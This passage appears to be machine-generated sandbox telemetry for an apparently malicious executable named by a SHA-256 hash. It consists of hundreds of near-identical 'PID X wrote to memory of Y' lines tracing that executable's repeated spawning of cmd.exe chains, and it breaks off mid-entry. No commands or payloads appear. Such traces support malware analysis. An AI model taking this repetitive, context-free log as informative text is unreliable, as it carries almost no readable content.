a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1011 PID 616 wrote to memory of 1948 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1011 PID 1948 wrote to memory of 1964 1948 cmd.exe 1013 PID 1948 wrote to memory of 1964 1948 cmd.exe 1013 PID 1948 wrote to memory of 1964 1948 cmd.exe 1013 PID 1948 wrote to memory of 1964 1948 cmd.exe 1013 PID 1948 wrote to memory of 1576 1948 cmd.exe 1014 PID 1948 wrote to memory of 1576 1948 cmd.exe 1014 PID 1948 wrote to memory of 1576 1948 cmd.exe 1014 PID 1948 wrote to memory of 1576 1948 cmd.exe 1014 PID 1948 wrote to memory of 1168 1948 cmd.exe 1015 PID 1948 wrote to memory of 1168 1948 cmd.exe 1015 PID 1948 wrote to memory of 1168 1948 cmd.exe 1015 PID 1948 wrote to memory of 1168 1948 cmd.exe 1015 PID 1168 wrote to memory of 1472 1168 cmd.exe 1016 PID 1168 wrote to memory of 1472 1168 cmd.exe 1016 PID 1168 wrote to memory of 1472 1168 cmd.exe 1016 PID 1168 wrote to memory of 1472 1168 cmd.exe 1016 PID 1948 wrote to memory of 2032 1948 cmd.exe 1017 PID 1948 wrote to memory of 2032 1948 cmd.exe 1017 PID 1948 wrote to memory of 2032 1948 cmd.exe 1017 PID 1948 wrote to memory of 2032 1948 cmd.exe 1017 PID 616 wrote to memory of 548 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1018 PID 616 wrote to memory of 548 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1018 PID 616 wrote to memory of 548 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1018 PID 616 wrote to memory of 548 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1018 PID 548 wrote to memory of 1744 548 cmd.exe 1020 PID 548 wrote to memory of 1744 548 cmd.exe 1020 PID 548 wrote to memory of 1744 548 cmd.exe 1020 PID 548 wrote to memory of 1744 548 cmd.exe 1020 PID 548 wrote to memory of 564 548 cmd.exe 1021 PID 548 wrote to memory of 564 548 cmd.exe 1021 PID 548 wrote to memory of 564 548 cmd.exe 1021 PID 548 wrote to memory of 564 548 cmd.exe 1021 PID 548 wrote to memory of 796 548 cmd.exe 1022 PID 548 wrote to memory of 796 548 cmd.exe 1022 PID 548 wrote to memory of 796 548 cmd.exe 1022 PID 548 wrote to memory of 796 548 cmd.exe 1022 PID 796 wrote to memory of 1152 796 cmd.exe 1023 PID 796 wrote to memory of 1152 796 cmd.exe 1023 PID 796 wrote to memory of 1152 796 cmd.exe 1023 PID 796 wrote to memory of 1152 796 cmd.exe 1023 PID 548 wrote to memory of 1980 548 cmd.exe 1024 PID 548 wrote to memory of 1980 548 cmd.exe 1024 PID 548 wrote to memory of 1980 548 cmd.exe 1024 PID 548 wrote to memory of 1980 548 cmd.exe 1024 PID 616 wrote to memory of 624 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1025 PID 616 wrote to memory of 624 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1025 PID 616 wrote to memory of 624 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1025 PID 616 wrote to memory of 624 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1025 PID 624 wrote to memory of 672 624 cmd.exe 1027 PID 624 wrote to memory of 672 624 cmd.exe 1027 PID 624 wrote to memory of 672 624 cmd.exe 1027 PID 624 wrote to memory of 672 624 cmd.exe 1027 PID 624 wrote to memory of 952 624 cmd.exe 1028 PID 624 wrote to memory of 952 624 cmd.exe 1028 PID 624 wrote to memory of 952 624 cmd.exe 1028 PID 624 wrote to memory of 952 624 cmd.exe 1028 PID 624 wrote to memory of 1996 624 cmd.exe 1029 PID 624 wrote to memory of 1996 624 cmd.exe 1029 PID 624 wrote to memory of 1996 624 cmd.exe 1029 PID 624 wrote to memory of 1996 624 cmd.exe 1029 PID 1996 wrote to memory of 220 1996 cmd.exe 1030 PID 1996 wrote to memory of 220 1996 cmd.exe 1030 PID 1996 wrote to memory of 220 1996 cmd.exe 1030 PID 1996 wrote to memory of 220 1996 cmd.exe 1030 PID 624 wrote to memory of 860 624 cmd.exe 1031 PID 624 wrote to memory of 860 624 cmd.exe 1031 PID 624 wrote to memory of 860 624 cmd.exe 1031 PID 624 wrote to memory of 860 624 cmd.exe 1031 PID 616 wrote to memory of 1784 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1032 PID 616 wrote to memory of 1784 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1032 PID 616 wrote to memory of 1784 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1032 PID 616 wrote to memory of 1784 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1032 PID 1784 wrote to memory of 1808 1784 cmd.exe 1034 PID 1784 wrote to memory of 1808 1784 cmd.exe 1034 PID 1784 wrote to memory of 1808 1784 cmd.exe 1034 PID 1784 wrote to memory of 1808 1784 cmd.exe 1034 PID 1784 wrote to memory of 1232 1784 cmd.exe 1035 PID 1784 wrote to memory of 1232 1784 cmd.exe 1035 PID 1784 wrote to memory of 1232 1784 cmd.exe 1035 PID 1784 wrote to memory of 1232 1784 cmd.exe 1035 PID 1784 wrote to memory of 856 1784 cmd.exe 1036 PID 1784 wrote to memory of 856 1784 cmd.exe 1036 PID 1784 wrote to memory of 856 1784 cmd.exe 1036 PID 1784 wrote to memory of 856 1784 cmd.exe 1036 PID 856 wrote to memory of 908 856 cmd.exe 1037 PID 856 wrote to memory of 908 856 cmd.exe 1037 PID 856 wrote to memory of 908 856 cmd.exe 1037 PID 856 wrote to memory of 908 856 cmd.exe 1037 PID 1784 wrote to memory of 920 1784 cmd.exe 1038 PID 1784 wrote to memory of 920 1784 cmd.exe 1038 PID 1784 wrote to memory of 920 1784 cmd.exe 1038 PID 1784 wrote to memory of 920 1784 cmd.exe 1038 PID 616 wrote to memory of 1432 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1039 PID 616 wrote to memory of 1432 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1039 PID 616 wrote to memory of 1432 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1039 PID 616 wrote to memory of 1432 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1039 PID 1432 wrote to memory of 1412 1432 cmd.exe 1041 PID 1432 wrote to memory of 1412 1432 cmd.exe 1041 PID 1432 wrote to memory of 1412 1432 cmd.exe 1041 PID 1432 wrote to memory of 1412 1432 cmd.exe 1041 PID 1432 wrote to memory of 1560 1432 cmd.exe 1042 PID 1432 wrote to memory of 1560 1432 cmd.exe 1042 PID 1432 wrote to memory of 1560 1432 cmd.exe 1042 PID 1432 wrote to memory of 1560 1432 cmd.exe 1042 PID 1432 wrote to memory of 1684 1432 cmd.exe 1043 PID 1432 wrote to memory of 1684 1432 cmd.exe 1043 PID 1432 wrote to memory of 1684 1432 cmd.exe 1043 PID 1432 wrote to memory of 1684 1432 cmd.exe 1043 PID 1684 wrote to memory of 660 1684 cmd.exe 1044 PID 1684 wrote to memory of 660 1684 cmd.exe 1044 PID 1684 wrote to memory of 660 1684 cmd.exe 1044 PID 1684 wrote to memory of 660 1684 cmd.exe 1044 PID 1432 wrote to memory of 2036 1432 cmd.exe 1045 PID 1432 wrote to memory of 2036 1432 cmd.exe 1045 PID 1432 wrote to memory of 2036 1432 cmd.exe 1045 PID 1432 wrote to memory of 2036 1432 cmd.exe 1045 PID 616 wrote to memory of 1488 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1046 PID 616 wrote to memory of 1488 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1046 PID 616 wrote to memory of 1488 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1046 PID 616 wrote to memory of 1488 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1046 PID 1488 wrote to memory of 1556 1488 cmd.exe 1048 PID 1488 wrote to memory of 1556 1488 cmd.exe 1048 PID 1488 wrote to memory of 1556 1488 cmd.exe 1048 PID 1488 wrote to memory of 1556 1488 cmd.exe 1048 PID 1488 wrote to memory of 1796 1488 cmd.exe 1049 PID 1488 wrote to memory of 1796 1488 cmd.exe 1049 PID 1488 wrote to memory of 1796 1488 cmd.exe 1049 PID 1488 wrote to memory of 1796 1488 cmd.exe 1049 PID 1488 wrote to memory of 964 1488 cmd.exe 1050 PID 1488 wrote to memory of 964 1488 cmd.exe 1050 PID 1488 wrote to memory of 964 1488 cmd.exe 1050 PID 1488 wrote to memory of 964 1488 cmd.exe 1050 PID 964 wrote to memory of 1020 964 cmd.exe 1051 PID 964 wrote to memory of 1020 964 cmd.exe 1051 PID 964 wrote to memory of 1020 964 cmd.exe 1051 PID 964 wrote to memory of 1020 964 cmd.exe 1051 PID 1488 wrote to memory of 680 1488 cmd.exe 1052 PID 1488 wrote to memory of 680 1488 cmd.exe 1052 PID 1488 wrote to memory of 680 1488 cmd.exe 1052 PID 1488 wrote to memory of 680 1488 cmd.exe 1052 PID 616 wrote to memory of 888 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1053 PID 616 wrote to memory of 888 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1053 PID 616 wrote to memory of 888 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1053 PID 616 wrote to memory of 888 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1053 PID 888 wrote to memory of 972 888 cmd.exe 1055 PID 888 wrote to memory of 972 888 cmd.exe 1055 PID 888 wrote to memory of 972 888 cmd.exe 1055 PID 888 wrote to memory of 972 888 cmd.exe 1055 PID 888 wrote to memory of 1576 888 cmd.exe 1056 PID 888 wrote to memory of 1576 888 cmd.exe 1056 PID 888 wrote to memory of 1576 888 cmd.exe 1056 PID 888 wrote to memory of 1576 888 cmd.exe 1056 PID 888 wrote to memory of 360 888 cmd.exe 1057 PID 888 wrote to memory of 360 888 cmd.exe 1057 PID 888 wrote to memory of 360 888 cmd.exe 1057 PID 888 wrote to memory of 360 888 cmd.exe 1057 PID 360 wrote to memory of 1168 360 cmd.exe 1058 PID 360 wrote to memory of 1168 360 cmd.exe 1058 PID 360 wrote to memory of 1168 360 cmd.exe 1058 PID 360 wrote to memory of 1168 360 cmd.exe 1058 PID 888 wrote to memory of 1440 888 cmd.exe 1059 PID 888 wrote to memory of 1440 888 cmd.exe 1059 PID 888 wrote to memory of 1440 888 cmd.exe 1059 PID 888 wrote to memory of 1440 888 cmd.exe 1059 PID 616 wrote to memory of 1332 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1060 PID 616 wrote to memory of 1332 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1060 PID 616 wrote to memory of 1332 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1060 PID 616 wrote to memory of 1332 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1060 PID 1332 wrote to memory of 1680 1332 cmd.exe 1062 PID 1332 wrote to memory of 1680 1332 cmd.exe 1062 PID 1332 wrote to memory of 1680 1332 cmd.exe 1062 PID 1332 wrote to memory of 1680 1332 cmd.exe 1062 PID 1332 wrote to memory of 564 1332 cmd.exe 1063 PID 1332 wrote to memory of 564 1332 cmd.exe 1063 PID 1332 wrote to memory of 564 1332 cmd.exe 1063 PID 1332 wrote to memory of 564 1332 cmd.exe 1063 PID 1332 wrote to memory of 1216 1332 cmd.exe 1064 PID 1332 wrote to memory of 1216 1332 cmd.exe 1064 PID 1332 wrote to memory of 1216 1332 cmd.exe 1064 PID 1332 wrote to memory of 1216 1332 cmd.exe 1064 PID 1216 wrote to memory of 796 1216 cmd.exe 1065 PID 1216 wrote to memory of 796 1216 cmd.exe 1065 PID 1216 wrote to memory of 796 1216 cmd.exe 1065 PID 1216 wrote to memory of 796 1216 cmd.exe 1065 PID 1332 wrote to memory of 1864 1332 cmd.exe 1066 PID 1332 wrote to memory of 1864 1332 cmd.exe 1066 PID 1332 wrote to memory of 1864 1332 cmd.exe 1066 PID 1332 wrote to memory of 1864 1332 cmd.exe 1066 PID 616 wrote to memory of 2036 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1067 PID 616 wrote to memory of 2036 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1067 PID 616 wrote to memory of 2036 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1067 PID 616 wrote to memory of 2036 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1067 PID 2036 wrote to memory of 976 2036 cmd.exe 1069 PID 2036 wrote to memory of 976 2036 cmd.exe 1069 PID 2036 wrote to memory of 976 2036 cmd.exe 1069 PID 2036 wrote to memory of 976 2036 cmd.exe 1069 PID 2036 wrote to memory of 1556 2036 cmd.exe 1070 PID 2036 wrote to memory of 1556 2036 cmd.exe 1070 PID 2036 wrote to memory of 1556 2036 cmd.exe 1070 PID 2036 wrote to memory of 1556 2036 cmd.exe 1070 PID 2036 wrote to memory of 1832 2036 cmd.exe 1071 PID 2036 wrote to memory of 1832 2036 cmd.exe 1071 PID 2036 wrote to memory of 1832 2036 cmd.exe 1071 PID 2036 wrote to memory of 1832 2036 cmd.exe 1071 PID 1832 wrote to memory of 1996 1832 cmd.exe 1072 PID 1832 wrote to memory of 1996 1832 cmd.exe 1072 PID 1832 wrote to memory of 1996 1832 cmd.exe 1072 PID 1832 wrote to memory of 1996 1832 cmd.exe 1072 PID 2036 wrote to memory of 436 2036 cmd.exe 1073 PID 2036 wrote to memory of 436 2036 cmd.exe 1073 PID 2036 wrote to memory of 436 2036 cmd.exe 1073 PID 2036 wrote to memory of 436 2036 cmd.exe 1073 PID 616 wrote to memory of 1828 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1074 PID 616 wrote to memory of 1828 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1074 PID 616 wrote to memory of 1828 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1074 PID 616 wrote to memory of 1828 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1074 PID 1828 wrote to memory of 528 1828 cmd.exe 1076 PID 1828 wrote to memory of 528 1828 cmd.exe 1076 PID 1828 wrote to memory of 528 1828 cmd.exe 1076 PID 1828 wrote to memory of 528 1828 cmd.exe 1076 PID 1828 wrote to memory of 1232 1828 cmd.exe 1077 PID 1828 wrote to memory of 1232 1828 cmd.exe 1077 PID 1828 wrote to memory of 1232 1828 cmd.exe 1077 PID 1828 wrote to memory of 1232 1828 cmd.exe 1077 PID 1828 wrote to memory of 836 1828 cmd.exe 1078 PID 1828 wrote to memory of 836 1828 cmd.exe 1078 PID 1828 wrote to memory of 836 1828 cmd.exe 1078 PID 1828 wrote to memory of 836 1828 cmd.exe 1078 PID 836 wrote to memory of 1868 836 cmd.exe 1079 PID 836 wrote to memory of 1868 836 cmd.exe 1079 PID 836 wrote to memory of 1868 836 cmd.exe 1079 PID 836 wrote to memory of 1868 836 cmd.exe 1079 PID 1828 wrote to memory of 1408 1828 cmd.exe 1080 PID 1828 wrote to memory of 1408 1828 cmd.exe 1080 PID 1828 wrote to memory of 1408 1828 cmd.exe 1080 PID 1828 wrote to memory of 1408 1828 cmd.exe 1080 PID 616 wrote to memory of 1936 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1081 PID 616 wrote to memory of 1936 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1081 PID 616 wrote to memory of 1936 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1081 PID 616 wrote to memory of 1936 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1081 PID 1936 wrote to memory of 1744 1936 cmd.exe 1083 PID 1936 wrote to memory of 1744 1936 cmd.exe 1083 PID 1936 wrote to memory of 1744 1936 cmd.exe 1083 PID 1936 wrote to memory of 1744 1936 cmd.exe 1083 PID 1936 wrote to memory of 1960 1936 cmd.exe 1084 PID 1936 wrote to memory of 1960 1936 cmd.exe 1084 PID 1936 wrote to memory of 1960 1936 cmd.exe 1084 PID 1936 wrote to memory of 1960 1936 cmd.exe 1084 PID 1936 wrote to memory of 660 1936 cmd.exe 1085 PID 1936 wrote to memory of 660 1936 cmd.exe 1085 PID 1936 wrote to memory of 660 1936 cmd.exe 1085 PID 1936 wrote to memory of 660 1936 cmd.exe 1085 PID 660 wrote to memory of 796 660 cmd.exe 1086 PID 660 wrote to memory of 796 660 cmd.exe 1086 PID 660 wrote to memory of 796 660 cmd.exe 1086 PID 660 wrote to memory of 796 660 cmd.exe 1086 PID 1936 wrote to memory of 1756 1936 cmd.exe 1087 PID 1936 wrote to memory of 1756 1936 cmd.exe 1087 PID 1936 wrote to memory of 1756 1936 cmd.exe 1087 PID 1936 wrote to memory of 1756 1936 cmd.exe 1087 PID 616 wrote to memory of 1332 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1088 PID 616 wrote to memory of 1332 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1088 PID 616 wrote to memory of 1332 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1088 PID 616 wrote to memory of 1332 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1088 PID 1332 wrote to memory of 228 1332 cmd.exe 1090 PID 1332 wrote to memory of 228 1332 cmd.exe 1090 PID 1332 wrote to memory of 228 1332 cmd.exe 1090 PID 1332 wrote to memory of 228 1332 cmd.exe 1090 PID 1332 wrote to memory of 952 1332 cmd.exe 1091 PID 1332 wrote to memory of 952 1332 cmd.exe 1091 PID 1332 wrote to memory of 952 1332 cmd.exe 1091 PID 1332 wrote to memory of 952 1332 cmd.exe 1091 PID 1332 wrote to memory of 1020 1332 cmd.exe 1092 PID 1332 wrote to memory of 1020 1332 cmd.exe 1092 PID 1332 wrote to memory of 1020 1332 cmd.exe 1092 PID 1332 wrote to memory of 1020 1332 cmd.exe 1092 PID 1020 wrote to memory of 1996 1020 cmd.exe 1093 PID 1020 wrote to memory of 1996 1020 cmd.exe 1093 PID 1020 wrote to memory of 1996 1020 cmd.exe 1093 PID 1020 wrote to memory of 1996 1020 cmd.exe 1093 PID 1332 wrote to memory of 680 1332 cmd.exe 1094 PID 1332 wrote to memory of 680 1332 cmd.exe 1094 PID 1332 wrote to memory of 680 1332 cmd.exe 1094 PID 1332 wrote to memory of 680 1332 cmd.exe 1094 PID 616 wrote to memory of 2036 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1095 PID 616 wrote to memory of 2036 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1095 PID 616 wrote to memory of 2036 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1095 PID 616 wrote to memory of 2036 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1095 PID 2036 wrote to memory of 1808 2036 cmd.exe 1097 PID 2036 wrote to memory of 1808 2036 cmd.exe 1097 PID 2036 wrote to memory of 1808 2036 cmd.exe 1097 PID 2036 wrote to memory of 1808 2036 cmd.exe 1097 PID 2036 wrote to memory of 1956 2036 cmd.exe 1098 PID 2036 wrote to memory of 1956 2036 cmd.exe 1098 PID 2036 wrote to memory of 1956 2036 cmd.exe 1098 PID 2036 wrote to memory of 1956 2036 cmd.exe 1098 PID 2036 wrote to memory of 360 2036 cmd.exe 1099 PID 2036 wrote to memory of 360 2036 cmd.exe 1099 PID 2036 wrote to memory of 360 2036 cmd.exe 1099 PID 2036 wrote to memory of 360 2036 cmd.exe 1099 PID 360 wrote to memory of 1868 360 cmd.exe 1100 PID 360 wrote to memory of 1868 360 cmd.exe 1100 PID 360 wrote to memory of 1868 360 cmd.exe 1100 PID 360 wrote to memory of 1868 360 cmd.exe 1100 PID 2036 wrote to memory of 920 2036 cmd.exe 1101 PID 2036 wrote to memory of 920 2036 cmd.exe 1101 PID 2036 wrote to memory of 920 2036 cmd.exe 1101 PID 2036 wrote to memory of 920 2036 cmd.exe 1101 PID 616 wrote to memory of 624 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1102 PID 616 wrote to memory of 624 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1102 PID 616 wrote to memory of 624 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1102 PID 616 wrote to memory of 624 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1102 PID 624 wrote to memory of 1412 624 cmd.exe 1104 PID 624 wrote to memory of 1412 624 cmd.exe 1104 PID 624 wrote to memory of 1412 624 cmd.exe 1104 PID 624 wrote to memory of 1412 624 cmd.exe 1104 PID 624 wrote to memory of 564 624 cmd.exe 1105 PID 624 wrote to memory of 564 624 cmd.exe 1105 PID 624 wrote to memory of 564 624 cmd.exe 1105 PID 624 wrote to memory of 564 624 cmd.exe 1105 PID 624 wrote to memory of 368 624 cmd.exe 1106 PID 624 wrote to memory of 368 624 cmd.exe 1106 PID 624 wrote to memory of 368 624 cmd.exe 1106 PID 624 wrote to memory of 368 624 cmd.exe 1106 PID 368 wrote to memory of 796 368 cmd.exe 1107 PID 368 wrote to memory of 796 368 cmd.exe 1107 PID 368 wrote to memory of 796 368 cmd.exe 1107 PID 368 wrote to memory of 796 368 cmd.exe 1107 PID 624 wrote to memory of 1460 624 cmd.exe 1108 PID 624 wrote to memory of 1460 624 cmd.exe 1108 PID 624 wrote to memory of 1460 624 cmd.exe 1108 PID 624 wrote to memory of 1460 624 cmd.exe 1108 PID 616 wrote to memory of 1936 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1109 PID 616 wrote to memory of 1936 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1109 PID 616 wrote to memory of 1936 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1109 PID 616 wrote to memory of 1936 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1109 PID 1936 wrote to memory of 976 1936 cmd.exe 1111 PID 1936 wrote to memory of 976 1936 cmd.exe 1111 PID 1936 wrote to memory of 976 1936 cmd.exe 1111 PID 1936 wrote to memory of 976 1936 cmd.exe 1111 PID 1936 wrote to memory of 1556 1936 cmd.exe 1112 PID 1936 wrote to memory of 1556 1936 cmd.exe 1112 PID 1936 wrote to memory of 1556 1936 cmd.exe 1112 PID 1936 wrote to memory of 1556 1936 cmd.exe 1112 PID 1936 wrote to memory of 1832 1936 cmd.exe 1113 PID 1936 wrote to memory of 1832 1936 cmd.exe 1113 PID 1936 wrote to memory of 1832 1936 cmd.exe 1113 PID 1936 wrote to memory of 1832 1936 cmd.exe 1113 PID 1832 wrote to memory of 1996 1832 cmd.exe 1114 PID 1832 wrote to memory of 1996 1832 cmd.exe 1114 PID 1832 wrote to memory of 1996 1832 cmd.exe 1114 PID 1832 wrote to memory of 1996 1832 cmd.exe 1114 PID 1936 wrote to memory of 688 1936 cmd.exe 1115 PID 1936 wrote to memory of 688 1936 cmd.exe 1115 PID 1936 wrote to memory of 688 1936 cmd.exe 1115 PID 1936 wrote to memory of 688 1936 cmd.exe 1115 PID 616 wrote to memory of 1332 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1116 PID 616 wrote to memory of 1332 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1116 PID 616 wrote to memory of 1332 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1116 PID 616 wrote to memory of 1332 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1116 PID 1332 wrote to memory of 1176 1332 cmd.exe 1118 PID 1332 wrote to memory of 1176 1332 cmd.exe 1118 PID 1332 wrote to memory of 1176 1332 cmd.exe 1118 PID 1332 wrote to memory of 1176 1332 cmd.exe 1118 PID 1332 wrote to memory of 1472 1332 cmd.exe 1119 PID 1332 wrote to memory of 1472 1332 cmd.exe 1119 PID 1332 wrote to memory of 1472 1332 cmd.exe 1119 PID 1332 wrote to memory of 1472 1332 cmd.exe 1119 PID 1332 wrote to memory of 836 1332 cmd.exe 1120 PID 1332 wrote to memory of 836 1332 cmd.exe 1120 PID 1332 wrote to memory of 836 1332 cmd.exe 1120 PID 1332 wrote to memory of 836 1332 cmd.exe 1120 PID 836 wrote to memory of 908 836 cmd.exe 1121 PID 836 wrote to memory of 908 836 cmd.exe 1121 PID 836 wrote to memory of 908 836 cmd.exe 1121 PID 836 wrote to memory of 908 836 cmd.exe 1121 PID 1332 wrote to memory of 1120 1332 cmd.exe 1122 PID 1332 wrote to memory of 1120 1332 cmd.exe 1122 PID 1332 wrote to memory of 1120 1332 cmd.exe 1122 PID 1332 wrote to memory of 1120 1332 cmd.exe 1122 PID 616 wrote to memory of 1964 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1123 PID 616 wrote to memory of 1964 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1123 PID 616 wrote to memory of 1964 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1123 PID 616 wrote to memory of 1964 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1123 PID 1964 wrote to memory of 1744 1964 cmd.exe 1125 PID 1964 wrote to memory of 1744 1964 cmd.exe 1125 PID 1964 wrote to memory of 1744 1964 cmd.exe 1125 PID 1964 wrote to memory of 1744 1964 cmd.exe 1125 PID 1964 wrote to memory of 1216 1964 cmd.exe 1126 PID 1964 wrote to memory of 1216 1964 cmd.exe 1126 PID 1964 wrote to memory of 1216 1964 cmd.exe 1126 PID 1964 wrote to memory of 1216 1964 cmd.exe 1126 PID 1964 wrote to memory of 1980 1964 cmd.exe 1127 PID 1964 wrote to memory of 1980 1964 cmd.exe 1127 PID 1964 wrote to memory of 1980 1964 cmd.exe 1127 PID 1964 wrote to memory of 1980 1964 cmd.exe 1127 PID 1980 wrote to memory of 1212 1980 cmd.exe 1128 PID 1980 wrote to memory of 1212 1980 cmd.exe 1128 PID 1980 wrote to memory of 1212 1980 cmd.exe 1128 PID 1980 wrote to memory of 1212 1980 cmd.exe 1128 PID 1964 wrote to memory of 1756 1964 cmd.exe 1129 PID 1964 wrote to memory of 1756 1964 cmd.exe 1129 PID 1964 wrote to memory of 1756 1964 cmd.exe 1129 PID 1964 wrote to memory of 1756 1964 cmd.exe 1129 PID 616 wrote to memory of 1584 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1130 PID 616 wrote to memory of 1584 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1130 PID 616 wrote to memory of 1584 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1130 PID 616 wrote to memory of 1584 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 1130 PID 1584 wrote to memory of 220 1584 cmd.exe 1132 PID 1584 wrote to memory of 220 1584 cmd.exe 1132 PID 1584 wrote to memory of 220 1584 cmd.exe 1132 PID 1584 wrote to memory of 220 1584 cmd.exe 1132 PID 1584 wrote to memory of 964 1584 cmd.exe 1133 PID 1584 wrote to memory of 964 1584 cmd.exe 1133 PID 1584 wrote to memory of 964 1584 cmd.exe 1133 PID 1584 wrote to memory of 964 1584 cmd.exe 1133 PID 1584 wrote to memory of 1556 1584 cmd.exe 1134 PID 1584 